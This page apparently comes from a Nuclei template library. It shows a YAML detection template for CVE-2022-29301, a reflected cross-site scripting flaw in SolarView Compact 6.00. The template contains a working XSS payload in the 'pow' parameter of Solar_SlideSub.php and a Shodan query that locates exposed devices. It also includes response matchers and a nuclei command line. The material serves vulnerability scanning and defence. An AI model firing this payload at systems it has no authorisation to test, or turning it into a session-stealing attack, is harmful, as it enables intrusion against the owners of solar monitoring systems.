Skip to content

SolarView Compact 6.00 - 'pow' Cross-Site Scripting

ID: CVE-2022-29301

Severity: high

Author: For3stCo1d

Tags: cve,cve2022,xss,solarview,edb

SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the ‘pow’ parameter to Solar_SlideSub.php.

id: CVE-2022-29301
info:
name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting
author: For3stCo1d
severity: high
description: |
SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact.
reference:
- https://www.exploit-db.com/exploits/50968
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cve-id: CVE-2022-29301
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-244067125
tags: cve,cve2022,xss,solarview,edb
http:
- method: GET
path:
- '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script><"">'
- 'SolarView'
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022100c54ec86684a53e9bc9f30d965eede052361a4004563f4a883cd9602764467e5a02201da05aa194285a829f936421e9e1f4ecd921cdff1aaee71160d645156843bdfa:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-29301.yaml"

View on Github